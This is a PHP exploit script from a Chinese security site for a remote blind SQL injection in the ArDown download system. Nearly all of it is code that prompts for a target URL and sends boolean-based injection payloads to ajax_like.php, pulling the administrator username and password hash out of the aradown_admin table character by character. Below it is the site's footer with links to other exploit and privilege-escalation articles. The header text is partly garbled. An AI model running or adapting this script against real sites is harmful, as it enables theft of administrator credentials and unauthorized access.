<?php
标题: ArDown (All Version) <- Remote Blind SQL Injection
作者 : G-B g22b@hotmail.com
程序下载地址 :
# Version : All Version
[*]-----------------------------------------------------------------------[*]
[*] Target -> ";
$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
echo "[*] Username : ";
for($i=1;$i<=30;$i++){
foreach($ar as $char){
$b = send(' www.2cto.com ',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){
$i = 50;
break;
}
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
echo "\n[*] Password : ";
for($i=1;$i<=32;$i++){
foreach($ar as $char){
$b = send('',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
function send($target,$query){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$r = curl_exec($ch);
curl_close($ch);
return $r;
}
function stdin(){
$fp = fopen("php://stdin","r");
$line = trim(fgets($fp));
fclose($fp);
return $line;
}
?>
,www.xuhantao.com,涛涛电脑知识网
AraDown盲注及修复
时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:
相关文章
- 没有相关文章
本类热门
- 05-19·记事狗2.5.0鸡肋注入漏洞
- 05-19·动易xss拿站小记
- 04-19·记一次有趣的提权
- 04-19·TNTHK小组内部版后门解析
- 05-19·新版百度空间存储型XSS
- 04-19·ecmall 2.3.0-0918-scgbk注入及修复
- 05-19·Z-Blog1.8绕过权限漏洞
- 05-19·ThinkPHP最新版3.0RC1存在XSS漏洞
- 04-19·Wordpree插件评论啦代码审计不严
- 04-19·绕过CDN查找真实IP的思路,一个新颖并另类的方法
本类推荐
- 05-19·IIS7.5畸形解析拿shell利用方法
- 05-19·从对一个安全产品的测试看产品架构安全
- 05-19·mysql被降权提权思路
- 05-19·记一次win2003垃圾提权
本类固顶
- 暂无信息
网站备案号:蒙ICP备15000590号-1